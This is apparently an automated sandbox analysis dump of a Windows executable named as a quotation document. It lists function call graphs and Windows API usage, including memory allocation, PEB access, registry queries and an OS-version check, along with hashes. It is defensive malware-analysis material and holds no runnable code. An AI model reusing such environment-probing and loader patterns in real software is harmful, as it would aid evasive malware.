617ea1 96892->96893 96894 617eec 96892->96894 96895 5afe0b 22 API calls 96893->96895 96898 619096 96894->96898 96896 617ec3 96895->96896 96896->96894 96897 5afddb 22 API calls 96896->96897 96897->96896 96899 6192ab messages 96898->96899 96905 6190ba _strcat _wcslen 96898->96905 96899->96857 96900 59b38f 39 API calls 96900->96905 96901 59b567 39 API calls 96901->96905 96902 59b6b5 39 API calls 96902->96905 96903 597510 53 API calls 96903->96905 96904 5bea0c 21 API calls ___std_exception_copy 96904->96905 96905->96899 96905->96900 96905->96901 96905->96902 96905->96903 96905->96904 96932 5fefae 24 API calls _wcslen 96905->96932 96909 5afc85 96907->96909 96908 5afd1d VirtualAlloc 96910 5afceb 96908->96910 96909->96908 96909->96910 96910->96860 96910->96861 96911->96870 96912->96870 96913->96864 96914->96866 96915->96868 96916->96872 96917->96877 96918->96877 96919->96877 96920->96849 96921->96877 96923 5f8e74 _wcslen 96922->96923 96924 5f8f63 96923->96924 96927 5f8ea9 96923->96927 96928 5f8f68 96923->96928 96924->96885 96924->96891 96927->96924 96930 5ace60 41 API calls 96927->96930 96928->96924 96931 5ace60 41 API calls 96928->96931 96929->96890 96930->96927 96931->96928 96932->96905 96933 17923b0 96947 1790000 96933->96947 96935 179246a 96950 17922a0 96935->96950 96953 1793490 GetPEB 96947->96953 96949 179068b 96949->96935 96951 17922a9 Sleep 96950->96951 96952 17922b7 96951->96952 96954 17934ba 96953->96954 96954->96949 96955 59df10 96958 59b710 96955->96958 96959 59b72b 96958->96959 96960 5e00f8 96959->96960 96961 5e0146 96959->96961 96969 59b750 96959->96969 96964 5e0102 96960->96964 96967 5e010f 96960->96967 96960->96969 97000 6158a2 256 API calls 2 library calls 96961->97000 96998 615d33 256 API calls 96964->96998 96983 59ba20 96967->96983 96999 6161d0 256 API calls 2 library calls 96967->96999 96975 5e0322 96969->96975 96979 59ba4e 96969->96979 96969->96983 96984 59bbe0 40 API calls 96969->96984 96985 5ad336 40 API calls 96969->96985 96986 59ec40 256 API calls 96969->96986 96987 59a8c7 22 API calls 96969->96987 96989 59a81b 41 API calls 96969->96989 96990 5ad2f0 40 API calls 96969->96990 96991 5aa01b 256 API calls 96969->96991 96992 5b0242 5 API calls __Init_thread_wait 96969->96992 96993 5aedcd 22 API calls 96969->96993 96994 5b00a3 29 API calls __onexit 96969->96994 96995 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96969->96995 96996 5aee53 82 API calls 96969->96996 96997 5ae5ca 256 API calls 96969->96997 97001 59aceb 23 API calls messages 96969->97001 97002 5ef6bf 23 API calls 96969->97002 96971 5e03d9 96971->96971 97003 615c0c 82 API calls 96975->97003 96983->96979 97004 60359c 82 API calls __wsopen_s 96983->97004 96984->96969 96985->96969 96986->96969 96987->96969 96989->96969 96990->96969 96991->96969 96992->96969 96993->96969 96994->96969 96995->96969 96996->96969 96997->96969 96998->96967 96999->96983 97000->96969 97001->96969 97002->96969 97003->96983 97004->96971 97005 59fe73 97012 5aceb1 97005->97012 97007 59fe89 97021 5acf92 97007->97021 97009 59feb3 97033 60359c 82 API calls __wsopen_s 97009->97033 97011 5e4ab8 97013 5acebf 97012->97013 97014 5aced2 97012->97014 97034 59aceb 23 API calls messages 97013->97034 97016 5aced7 97014->97016 97017 5acf05 97014->97017 97018 5afddb 22 API calls 97016->97018 97035 59aceb 23 API calls messages 97017->97035 97020 5acec9 97018->97020 97020->97007 97022 596270 22 API calls 97021->97022 97023 5acfc9 97022->97023 97024 599cb3 22 API calls 97023->97024 97026 5acffa 97023->97026 97025 5ed166 97024->97025 97027 596350 22 API calls 97025->97027 97026->97009 97028 5ed171 97027->97028 97036 5ad2f0 40 API calls 97028->97036 97030 5ed184 97032 5ed188 97030->97032 97037 59aceb 23 API calls messages 97030->97037 97032->97032 97033->97011 97034->97020 97035->97020 97036->97030 97037->97032 97038 591033 97043 594c91 97038->97043 97042 591042 97044 59a961 22 API calls 97043->97044 97045 594cff 97044->97045 97051 593af0 97045->97051 97048 594d9c 97049 591038 97048->97049 97054 5951f7 22 API calls __fread_nolock 97048->97054 97050 5b00a3 29 API calls __onexit 97049->97050 97050->97042 97055 593b1c 97051->97055 97054->97048 97056 593b0f 97055->97056 97057 593b29 97055->97057 97056->97048 97057->97056 97058 593b30 RegOpenKeyExW 97057->97058 97058->97056 97059 593b4a RegQueryValueExW 97058->97059 97060 593b6b 97059->97060 97061 593b80 RegCloseKey 97059->97061 97060->97061 97061->97056 97062 592e37 97063 59a961 22 API calls 97062->97063 97064 592e4d 97063->97064 97141 594ae3 97064->97141 97066 592e6b 97067 593a5a 24 API calls 97066->97067 97068 592e7f 97067->97068 97069 599cb3 22 API calls 97068->97069 97070 592e8c 97069->97070 97071 594ecb 94 API calls 97070->97071 97072 592ea5 97071->97072 97073 592ead 97072->97073 97074 5d2cb0 97072->97074 97077 59a8c7 22 API calls 97073->97077 97171 602cf9 97074->97171 97076 5d2cc3 97078 5d2ccf 97076->97078 97079 594f39 68 API calls 97076->97079 97080 592ec3 97077->97080 97082 594f39 68 API calls 97078->97082 97079->97078 97155 596f88 22 API calls 97080->97155 97084 5d2ce5 97082->97084 97083 592ecf 97085 599cb3 22 API calls 97083->97085 97197 593084 22 API calls 97084->97197 97086 592edc 97085->97086 97156 59a81b 41 API calls 97086->97156 97089 592eec 97091 599cb3 22 API calls 97089->97091 97090 5d2d02 97198 593084 22 API calls 97090->97198 97092 592f12 97091->97092 97157 59a81b 41 API calls 97092->97157 97095 5d2d1e 97096 593a5a 24 API calls 97095->97096 97097 5d2d44 97096->97097 97199 593084 22 API calls 97097->97199 97098 592f21 97101 59a961 22 API calls 97098->97101 97100 5d2d50 97102 59a8c7 22 API calls 97100->97102 97103 592f3f 97101->97103 97104 5d2d5e 97102->97104 97158 593084 22 API calls 97103->97158 97200 593084 22 API calls 97104->97200 97107 592f4b 97159 5b4a28 40 API calls 3 library calls 97107->97159 97108 5d2d6d 97113 59a8c7 22 API calls 97108->97113 97110 592f59 97110->97084 97111 592f63 97110->97111 97160 5b4a28 40 API calls 3 library calls 97111->97160 97115 5d2d83 97113->97115 97114 592f6e 97114->97090 97116 592f78 97114->97116 97201 593084 22 API calls 97115->97201 97161 5b4a28 40 API calls 3 library calls 97116->97161 97119 5d2d90 97120 592f83 97120->97095 97121 592f8d 97120->97121 97162 5b4a28 40 API calls 3 library calls 97121->97162 97123 592f98 97124 592fdc 97123->97124 97163 593084 22 API calls 97123->97163 97124->97108 97125 592fe8 97124->97125 97125->97119 97165 5963eb 22 API calls 97125->97165 97128 592fbf 97130 59a8c7 22 API calls 97128->97130 97129 592ff8 97166 596a50 22 API calls 97129->97166 97132 592fcd 97130->97132 97164 593084 22 API calls 97132->97164 97134 593006 97167 5970b0 23 API calls 97134->97167 97138 593021 97139 593065 97138->97139 97168 596f88 22 API calls 97138->97168 97169 5970b0 23 API calls 97138->97169 97170 593084 22 API calls 97138->97170 97142 594af0 __wsopen_s 97141->97142 97143 596b57 22 API calls 97142->97143 97144 594b22 97142->97144 97143->97144 97145 594c6d 22 API calls 97144->97145 97154 594b58 97144->97154 97145->97144 97146 594c6d 22 API calls 97146->97154 97147 599cb3 22 API calls 97149 594c52 97147->97149 97148 599cb3 22 API calls 97148->97154 97150 59515f 22 API calls 97149->97150 97152 594c5e 97150->97152 97151 59515f 22 API calls 97151->97154 97152->97066 97153 594c29 97153->97147 97153->97152 97154->97146 97154->97148 97154->97151 97154->97153 97155->97083 97156->97089 97157->97098 97158->97107 97159->97110 97160->97114 97161->97120 97162->97123 97163->97128 97164->97124 97165->97129 97166->97134 97167->97138 97168->97138 97169->97138 97170->97138 97172 602d15 97171->97172 97173 59511f 64 API calls 97172->97173 97174 602d29 97173->97174 97175 602e66 75 API calls 97174->97175 97176 602d3b 97175->97176 97177 5950f5 40 API calls 97176->97177 97194 602d3f 97176->97194 97178 602d56 97177->97178 97179 5950f5 40 API calls 97178->97179 97180 602d66 97179->97180 97181 5950f5 40 API calls 97180->97181 97182 602d81 97181->97182 97183 5950f5 40 API calls 97182->97183 97184 602d9c 97183->97184 97185 59511f 64 API calls 97184->97185 97186 602db3 97185->97186 97187 5bea0c ___std_exception_copy 21 API calls 97186->97187 97188 602dba 97187->97188 97189 5bea0c ___std_exception_copy 21 API calls 97188->97189 97190 602dc4 97189->97190 97191 5950f5 40 API calls 97190->97191 97192 602dd8 97191->97192 97193 6028fe 27 API calls 97192->97193 97195 602dee 97193->97195 97194->97076 97195->97194 97196 6022ce 79 API calls 97195->97196 97196->97194 97197->97090 97198->97095 97199->97100 97200->97108 97201->97119 97202 593156 97205 593170 97202->97205 97206 593187 97205->97206 97207 5931eb 97206->97207 97208 59318c 97206->97208 97209 5931e9 97206->97209 97213 5d2dfb 97207->97213 97214 5931f1 97207->97214 97210 593199 97208->97210 97211 593265 PostQuitMessage 97208->97211 97212 5931d0 DefWindowProcW 97209->97212 97216 5d2e7c 97210->97216 97217 5931a4 97210->97217 97218 59316a 97211->97218 97212->97218 97254 5918e2 10 API calls 97213->97254 97219 5931f8 97214->97219 97220 59321d SetTimer RegisterWindowMessageW 97214->97220 97269 5fbf30 34 API calls ___scrt_fastfail 97216->97269 97224 5d2e68 97217->97224 97225 5931ae 97217->97225 97221 5d2d9c 97219->97221 97222 593201 KillTimer 97219->97222 97220->97218 97226 593246 CreatePopupMenu 97220->97226 97234 5d2dd7 MoveWindow 97221->97234 97235 5d2da1 97221->97235 97250 5930f2 Shell_NotifyIconW ___scrt_fastfail 97222->97250 97223 5d2e1c 97255 5ae499 42 API calls 97223->97255 97268 5fc161 27 API calls ___scrt_fastfail 97224->97268 97231 5d2e4d 97225->97231 97232 5931b9 97225->97232 97226->97218 97231->97212 97267 5f0ad7 22 API calls 97231->97267 97238 5931c4 97232->97238 97239 593253 97232->97239 97233 5d2e8e 97233->97212 97233->97218 97234->97218 97240 5d2da7 97235->97240 97241 5d2dc6 SetFocus 97235->97241 97236 593214 97251 593c50 DeleteObject DestroyWindow 97236->97251 97237 593263 97237->97218 97238->97212 97256 5930f2 Shell_NotifyIconW ___scrt_fastfail 97238->97256 97252 59326f 44 API calls ___scrt_fastfail 97239->97252 97240->97238 97245 5d2db0 97240->97245 97241->97218 97253 5918e2 10 API calls 97245->97253 97248 5d2e41 97257 593837 97248->97257 97250->97236 97251->97218 97252->97237 97253->97218 97254->97223 97255->97238 97256->97248 97258 593862 ___scrt_fastfail 97257->97258 97270 594212 97258->97270 97262 5d3386 Shell_NotifyIconW 97263 593906 Shell_NotifyIconW 97274 593923 97263->97274 97265 5938e8 97265->97262 97265->97263 97266 59391c 97266->97209 97267->97209 97268->97237 97269->97233 97271 5d35a4 97270->97271 97272 5938b7 97270->97272 97271->97272 97273 5d35ad DestroyIcon 97271->97273 97272->97265 97296 5fc874 42 API calls _strftime 97272->97296 97273->97272 97275 59393f 97274->97275 97276 593a13 97274->97276 97277 596270 22 API calls 97275->97277 97276->97266 97278 59394d 97277->97278 97279 59395a 97278->97279 97280 5d3393 LoadStringW 97278->97280 97281 596b57 22 API calls 97279->97281 97282 5d33ad 97280->97282 97283 59396f 97281->97283 97286 59a8c7 22 API calls 97282->97286 97290 593994 ___scrt_fastfail 97282->97290 97284 5d33c9 97283->97284 97285 59397c 97283->97285 97288 596350 22 API calls 97284->97288 97285->97282 97287 593986 97285->97287 97286->97290 97289 596350 22 API calls 97287->97289 97291 5d33d7 97288->97291 97289->97290 97293 5939f9 Shell_NotifyIconW 97290->97293 97291->97290 97292 5933c6 22 API calls 97291->97292 97294 5d33f9 97292->97294 97293->97276 97295 5933c6 22 API calls 97294->97295 97295->97290 97296->97265 97297 591cad SystemParametersInfoW 97298 5d2ba5 97299 5d2baf 97298->97299 97300 592b25 97298->97300 97302 593a5a 24 API calls 97299->97302 97326 592b83 7 API calls 97300->97326 97303 5d2bb8 97302->97303 97305 599cb3 22 API calls 97303->97305 97308 5d2bc6 97305->97308 97307 592b2f 97313 593837 49 API calls 97307->97313 97315 592b44 97307->97315 97309 5d2bce 97308->97309 97310 5d2bf5 97308->97310 97311 5933c6 22 API calls 97309->97311 97312 5933c6 22 API calls 97310->97312 97314 5d2bd9 97311->97314 97325 5d2bf1 GetForegroundWindow ShellExecuteW 97312->97325 97313->97315 97317 596350 22 API calls 97314->97317 97316 592b5f 97315->97316 97330 5930f2 Shell_NotifyIconW ___scrt_fastfail 97315->97330 97321 592b66 SetCurrentDirectoryW 97316->97321 97320 5d2be7 97317->97320 97322 5933c6 22 API calls 97320->97322 97324 592b7a 97321->97324 97322->97325 97323 5d2c26 97323->97316 97325->97323 97331 592cd4 7 API calls 97326->97331 97328 592b2a 97329 592c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97328->97329 97329->97307 97330->97316 97331->97328 97332 592de3 97333 592df0 __wsopen_s 97332->97333 97334 592e09 97333->97334 97335 5d2c2b ___scrt_fastfail 97333->97335 97336 593aa2 23 API calls 97334->97336 97338 5d2c47 GetOpenFileNameW 97335->97338 97337 592e12 97336->97337 97348 592da5 97337->97348 97340 5d2c96 97338->97340 97342 596b57 22 API calls 97340->97342 97344 5d2cab 97342->97344 97344->97344 97345 592e27 97366 5944a8 97345->97366 97349 5d1f50 __wsopen_s 97348->97349 97350 592db2 GetLongPathNameW 97349->97350 97351 596b57 22 API calls 97350->97351 97352 592dda 97351->97352 97353 593598 97352->97353 97354 59a961 22 API calls 97353->97354 97355 5935aa 97354->97355 97356 593aa2 23 API calls 97355->97356 97357 5935b5 97356->97357 97358 5935c0 97357->97358 97363 5d32eb 97357->97363 97359 59515f 22 API calls 97358->97359 97361 5935cc 97359->97361 97395 5935f3 97361->97395 97364 5d330d 97363->97364 97401 5ace60 41 API calls 97363->97401 97365 5935df 97365->97345 97367 594ecb 94 API calls 97366->97367 97368 5944cd 97367->97368 97369 5d3833 97368->97369 97370 594ecb 94 API calls 97368->97370 97371 602cf9 80 API calls 97369->97371 97372 5944e1 97370->97372 97373 5d3848 97371->97373 97372->97369 97374 5944e9 97372->97374 97375 5d384c 97373->97375 97376 5d3869 97373->97376 97378 5d3854 97374->97378 97379 5944f5 97374->97379 97380 594f39 68 API calls 97375->97380 97377 5afe0b 22 API calls 97376->97377 97386 5d38ae 97377->97386 97417 5fda5a 82 API calls 97378->97417 97416 59940c 136 API calls 2 library calls 97379->97416 97380->97378 97383 5d3862 97383->97376 97384 592e31 97385 594f39 68 API calls 97389 5d3a5f 97385->97389 97386->97389 97392 599cb3 22 API calls 97386->97392 97402 59a4a1 97386->97402 97410 593ff7 97386->97410 97418 5f967e 22 API calls __fread_nolock 97386->97418 97419 5f95ad 42 API calls _wcslen 97386->97419 97420 600b5a 22 API calls 97386->97420 97389->97385 97421 5f989b 82 API calls __wsopen_s 97389->97421 97392->97386 97396 593605 97395->97396 97400 593624 __fread_nolock 97395->97400 97399 5afe0b 22 API calls 97396->97399 97397 5afddb 22 API calls 97398 59363b 97397->97398 97398->97365 97399->97400 97400->97397 97401->97363 97403 59a52b 97402->97403 97407 59a4b1 __fread_nolock 97402->97407 97405 5afe0b 22 API calls 97403->97405 97404 5afddb 22 API calls 97406 59a4b8 97404->97406 97405->97407 97408 5afddb 22 API calls 97406->97408 97409 59a4d6 97406->97409 97407->97404 97408->97409 97409->97386 97411 59400a 97410->97411 97414 5940ae 97410->97414 97412 5afe0b 22 API calls 97411->97412 97415 59403c 97411->97415 97412->97415 97413 5afddb 22 API calls 97413->97415 97414->97386 97415->97413 97415->97414 97416->97384 97417->97383 97418->97386 97419->97386 97420->97386 97421->97389 97422 591044 97427 5910f3 97422->97427 97424 59104a 97463 5b00a3 29 API calls __onexit 97424->97463 97426 591054 97464 591398 97427->97464 97431 59116a 97432 59a961 22 API calls 97431->97432 97433 591174 97432->97433 97434 59a961 22 API calls 97433->97434 97435 59117e 97434->97435 97436 59a961 22 API calls 97435->97436 97437 591188 97436->97437 97438 59a961 22 API calls 97437->97438 97439 5911c6 97438->97439 97440 59a961 22 API calls 97439->97440 97441 591292 97440->97441 97474 59171c 97441->97474 97445 5912c4 97446 59a961 22 API calls 97445->97446 97447 5912ce 97446->97447 97448 5a1940 9 API calls 97447->97448 97449 5912f9 97448->97449 97495 591aab 97449->97495 97451 591315 97452 591325 GetStdHandle 97451->97452 97453 59137a 97452->97453 97454 5d2485 97452->97454 97457 591387 OleInitialize 97453->97457 97454->97453 97455 5d248e 97454->97455 97456 5afddb 22 API calls 97455->97456 97458 5d2495 97456->97458 97457->97424 97502 60011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97458->97502 97460 5d249e 97503 600944 CreateThread 97460->97503 97462 5d24aa CloseHandle 97462->97453 97463->97426 97504 5913f1 97464->97504 97467 5913f1 22 API calls 97468 5913d0 97467->97468 97469 59a961 22 API calls 97468->97469 97470 5913dc 97469->97470 97471 596b57 22 API calls 97470->97471 97472 591129 97471->97472 97473 591bc3 6 API calls 97472->97473 97473->97431 97475 59a961 22 API calls 97474->97475 97476 59172c 97475->97476 97477 59a961 22 API calls 97476->97477 97478 591734 97477->97478 97479 59a961 22 API calls 97478->97479 97480 59174f 97479->97480 97481 5afddb 22 API calls 97480->97481 97482 59129c 97481->97482 97483 591b4a 97482->97483 97484 591b58 97483->97484 97485 59a961 22 API calls 97484->97485 97486 591b63 97485->97486 97487 59a961 22 API calls 97486->97487 97488 591b6e 97487->97488 97489 59a961 22 API calls 97488->97489 97490 591b79 97489->97490 97491 59a961 22 API calls 97490->97491 97492 591b84 97491->97492 97493 5afddb 22 API calls 97492->97493 97494 591b96 RegisterWindowMessageW 97493->97494 97494->97445 97496 5d272d 97495->97496 97497 591abb 97495->97497 97511 603209 23 API calls 97496->97511 97499 5afddb 22 API calls 97497->97499 97501 591ac3 97499->97501 97500 5d2738 97501->97451 97502->97460 97503->97462 97512 60092a 28 API calls 97503->97512 97505 59a961 22 API calls 97504->97505 97506 5913fc 97505->97506 97507 59a961 22 API calls 97506->97507 97508 591404 97507->97508 97509 59a961 22 API calls 97508->97509 97510 5913c6 97509->97510 97510->97467 97511->97500 97513 5c8402 97518 5c81be 97513->97518 97517 5c842a 97523 5c81ef try_get_first_available_module 97518->97523 97520 5c83ee 97537 5c27ec 26 API calls pre_c_initialization 97520->97537 97522 5c8343 97522->97517 97530 5d0984 97522->97530 97529 5c8338 97523->97529 97533 5b8e0b 40 API calls 2 library calls 97523->97533 97525 5c838c 97525->97529 97534 5b8e0b 40 API calls 2 library calls 97525->97534 97527 5c83ab 97527->97529 97535 5b8e0b 40 API calls 2 library calls 97527->97535 97529->97522 97536 5bf2d9 20 API calls _free 97529->97536 97538 5d0081 97530->97538 97532 5d099f 97532->97517 97533->97525 97534->97527 97535->97529 97536->97520 97537->97522 97539 5d008d CallCatchBlock 97538->97539 97540 5d009b 97539->97540 97543 5d00d4 97539->97543 97596 5bf2d9 20 API calls _free 97540->97596 97542 5d00a0 97597 5c27ec 26 API calls pre_c_initialization 97542->97597 97549 5d065b 97543->97549 97548 5d00aa __fread_nolock 97548->97532 97599 5d042f 97549->97599 97552 5d068d 97631 5bf2c6 20 API calls _free 97552->97631 97553 5d06a6 97617 5c5221 97553->97617 97556 5d06ab 97557 5d06cb 97556->97557 97558 5d06b4 97556->97558 97630 5d039a CreateFileW 97557->97630 97633 5bf2c6 20 API calls _free 97558->97633 97562 5d06b9 97634 5bf2d9 20 API calls _free 97562->97634 97563 5d0704 97565 5d0781 GetFileType 97563->97565 97567 5d0756 GetLastError 97563->97567 97635 5d039a CreateFileW 97563->97635 97566 5d078c GetLastError 97565->97566 97569 5d07d3 97565->97569 97637 5bf2a3 20 API calls 2 library calls 97566->97637 97636 5bf2a3 20 API calls 2 library calls 97567->97636 97639 5c516a 21 API calls 3 library calls 97569->97639 97571 5d079a CloseHandle 97573 5d0692 97571->97573 97574 5d07c3 97571->97574 97632 5bf2d9 20 API calls _free 97573->97632 97638 5bf2d9 20 API calls _free 97574->97638 97576 5d0749 97576->97565 97576->97567 97578 5d07f4 97580 5d0840 97578->97580 97640 5d05ab 72 API calls 4 library calls 97578->97640 97579 5d07c8 97579->97573 97584 5d086d 97580->97584 97641 5d014d 72 API calls 4 library calls 97580->97641 97583 5d0866 97583->97584 97585 5d087e 97583->97585 97586 5c86ae __wsopen_s 29 API calls 97584->97586 97587 5d00f8 97585->97587 97588 5d08fc CloseHandle 97585->97588 97586->97587 97598 5d0121 LeaveCriticalSection __wsopen_s 97587->97598 97642 5d039a CreateFileW 97588->97642 97590 5d0927 97591 5d0931 GetLastError 97590->97591 97592 5d095d 97590->97592 97643 5bf2a3 20 API calls 2 library calls 97591->97643 97592->97587 97594 5d093d 97644 5c5333 21 API calls 3 library calls 97594->97644 97596->97542 97597->97548 97598->97548 97600 5d046a 97599->97600 97601 5d0450 97599->97601 97645 5d03bf 97600->97645 97601->97600 97652 5bf2d9 20 API calls _free 97601->97652 97604 5d045f 97653 5c27ec 26 API calls pre_c_initialization 97604->97653 97606 5d04a2 97607 5d04d1 97606->97607 97654 5bf2d9 20 API calls _free 97606->97654 97615 5d0524 97607->97615 97656 5bd70d 26 API calls 2 library calls 97607->97656 97610 5d051f 97612 5d059e 97610->97612 97610->97615 97611 5d04c6 97655 5c27ec 26 API calls pre_c_initialization 97611->97655 97657 5c27fc 11 API calls _abort 97612->97657 97615->97552 97615->97553 97616 5d05aa 97618 5c522d CallCatchBlock 97617->97618 97660 5c2f5e EnterCriticalSection 97618->97660 97620 5c5234 97622 5c5259 97620->97622 97626 5c52c7 EnterCriticalSection 97620->97626 97628 5c527b 97620->97628 97664 5c5000 21 API calls 2 library calls 97622->97664 97623 5c52a4 __fread_nolock 97623->97556 97625 5c525e 97625->97628 97665 5c5147 EnterCriticalSection 97625->97665 97627 5c52d4 LeaveCriticalSection 97626->97627 97626->97628 97627->97620 97661 5c532a 97628->97661 97630->97563 97631->97573 97632->97587 97633->97562 97634->97573 97635->97576 97636->97573 97637->97571 97638->97579 97639->97578 97640->97580 97641->97583 97642->97590 97643->97594 97644->97592 97647 5d03d7 97645->97647 97646 5d03f2 97646->97606 97647->97646 97658 5bf2d9 20 API calls _free 97647->97658 97649 5d0416 97659 5c27ec 26 API calls pre_c_initialization 97649->97659 97651 5d0421 97651->97606 97652->97604 97653->97600 97654->97611 97655->97607 97656->97610 97657->97616 97658->97649 97659->97651 97660->97620 97666 5c2fa6 LeaveCriticalSection 97661->97666 97663 5c5331 97663->97623 97664->97625 97665->97628 97666->97663 97667 5e2a00 97673 59d7b0 messages 97667->97673 97668 59d9d5 97669 59db11 PeekMessageW 97669->97673 97670 59d807 GetInputState 97670->97669 97670->97673 97671 5e1cbe TranslateAcceleratorW 97671->97673 97673->97668 97673->97669 97673->97670 97673->97671 97674 59db8f PeekMessageW 97673->97674 97675 59db73 TranslateMessage DispatchMessageW 97673->97675 97676 59da04 timeGetTime 97673->97676 97677 59dbaf Sleep 97673->97677 97678 5e2b74 Sleep 97673->97678 97680 5e1dda timeGetTime 97673->97680 97695 59ec40 256 API calls 97673->97695 97697 5a1310 256 API calls 97673->97697 97699 59dd50 97673->97699 97706 59dfd0 97673->97706 97729 59bf40 256 API calls 2 library calls 97673->97729 97730 5aedf6 IsDialogMessageW GetClassLongW 97673->97730 97732 603a2a 23 API calls 97673->97732 97733 60359c 82 API calls __wsopen_s 97673->97733 97674->97673 97675->97674 97676->97673 97679 59dbc0 97677->97679 97678->97679 97679->97668 97679->97673 97681 5ae551 timeGetTime 97679->97681 97684 5e2c0b GetExitCodeProcess 97679->97684 97685 6229bf GetForegroundWindow 97679->97685 97689 5e2a31 97679->97689 97690 5e2ca9 Sleep 97679->97690 97734 615658 23 API calls 97679->97734 97735 5fe97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97679->97735 97736 5fd4dc 47 API calls 97679->97736 97731 5ae300 23 API calls 97680->97731 97681->97679 97687 5e2c37 CloseHandle 97684->97687 97688 5e2c21 WaitForSingleObject 97684->97688 97685->97679 97687->97679 97688->97673 97688->97687 97689->97668 97690->97673 97695->97673 97697->97673 97700 59dd6f 97699->97700 97701 59dd83 97699->97701 97737 59d260 256 API calls 2 library calls 97700->97737 97738 60359c 82 API calls __wsopen_s 97701->97738 97704 59dd7a 97704->97673 97705 5e2f75 97705->97705 97707 59e010 97706->97707 97718 59e0dc messages 97707->97718 97741 5b0242 5 API calls __Init_thread_wait 97707->97741 97710 5e2fca 97712 59a961 22 API calls 97710->97712 97710->97718 97711 59a961 22 API calls 97711->97718 97713 5e2fe4 97712->97713 97742 5b00a3 29 API calls __onexit 97713->97742 97717 5e2fee 97743 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97717->97743 97718->97711 97721 59ec40 256 API calls 97718->97721 97723 59a8c7 22 API calls 97718->97723 97724 5a04f0 22 API calls 97718->97724 97725 60359c 82 API calls 97718->97725 97726 59e3e1 97718->97726 97739 59a81b 41 API calls 97718->97739 97740 5aa308 256 API calls 97718->97740 97744 5b0242 5 API calls __Init_thread_wait 97718->97744 97745 5b00a3 29 API calls __onexit 97718->97745 97746 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97718->97746 97747 6147d4 256 API calls 97718->97747 97748 6168c1 256 API calls 97718->97748 97721->97718 97723->97718 97724->97718 97725->97718 97726->97673 97729->97673 97730->97673 97731->97673 97732->97673 97733->97673 97734->97679 97735->97679 97736->97679 97737->97704 97738->97705 97739->97718 97740->97718 97741->97710 97742->97717 97743->97718 97744->97718 97745->97718 97746->97718 97747->97718 97748->97718

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 234 5942de-59434d call 59a961 GetVersionExW call 596b57 239 5d3617-5d362a 234->239 240 594353 234->240 241 5d362b-5d362f 239->241 242 594355-594357 240->242 243 5d3631 241->243 244 5d3632-5d363e 241->244 245 59435d-5943bc call 5993b2 call 5937a0 242->245 246 5d3656 242->246 243->244 244->241 247 5d3640-5d3642 244->247 263 5d37df-5d37e6 245->263 264 5943c2-5943c4 245->264 250 5d365d-5d3660 246->250 247->242 249 5d3648-5d364f 247->249 249->239 252 5d3651 249->252 253 59441b-594435 GetCurrentProcess IsWow64Process 250->253 254 5d3666-5d36a8 250->254 252->246 256 594494-59449a 253->256 257 594437 253->257 254->253 258 5d36ae-5d36b1 254->258 260 59443d-594449 256->260 257->260 261 5d36db-5d36e5 258->261 262 5d36b3-5d36bd 258->262 269 59444f-59445e LoadLibraryA 260->269 270 5d3824-5d3828 GetSystemInfo 260->270 265 5d36f8-5d3702 261->265 266 5d36e7-5d36f3 261->266 271 5d36bf-5d36c5 262->271 272 5d36ca-5d36d6 262->272 267 5d37e8 263->267 268 5d3806-5d3809 263->268 264->250 273 5943ca-5943dd 264->273 277 5d3715-5d3721 265->277 278 5d3704-5d3710 265->278 266->253 276 5d37ee 267->276 279 5d380b-5d381a 268->279 280 5d37f4-5d37fc 268->280 281 59449c-5944a6 GetSystemInfo 269->281 282 594460-59446e GetProcAddress 269->282 271->253 272->253 274 5943e3-5943e5 273->274 275 5d3726-5d372f 273->275 283 5d374d-5d3762 274->283 284 5943eb-5943ee 274->284 285 5d373c-5d3748 275->285 286 5d3731-5d3737 275->286 276->280 277->253 278->253 279->276 287 5d381c-5d3822 279->287 280->268 289 594476-594478 281->289 282->281 288 594470-594474 GetNativeSystemInfo 282->288 292 5d376f-5d377b 283->292 293 5d3764-5d376a 283->293 290 5d3791-5d3794 284->290 291 5943f4-59440f 284->291 285->253 286->253 287->280 288->289 294 59447a-59447b FreeLibrary 289->294 295 594481-594493 289->295 290->253 298 5d379a-5d37c1 290->298 296 594415 291->296 297 5d3780-5d378c 291->297 292->253 293->253 294->295 296->253 297->253 299 5d37ce-5d37da 298->299 300 5d37c3-5d37c9 298->300 299->253 300->253
              APIs
              • GetVersionExW.KERNEL32(?), ref: 0059430D
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              • GetCurrentProcess.KERNEL32(?,0062CB64,00000000,?,?), ref: 00594422
              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00594429
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00594454
              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00594466
              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00594474
              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0059447B
              • GetSystemInfo.KERNEL32(?,?,?), ref: 005944A0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
              • String ID: GetNativeSystemInfo$kernel32.dll$|O
              • API String ID: 3290436268-3101561225
              • Opcode ID: e37a80c56538e5e1b5326a6383199c12c19e108e699956209b4491270ed31606
              • Instruction ID: 59cfebe527b089dd151a32da9f4bd61475b013321412b9b81f2c241b707ef354
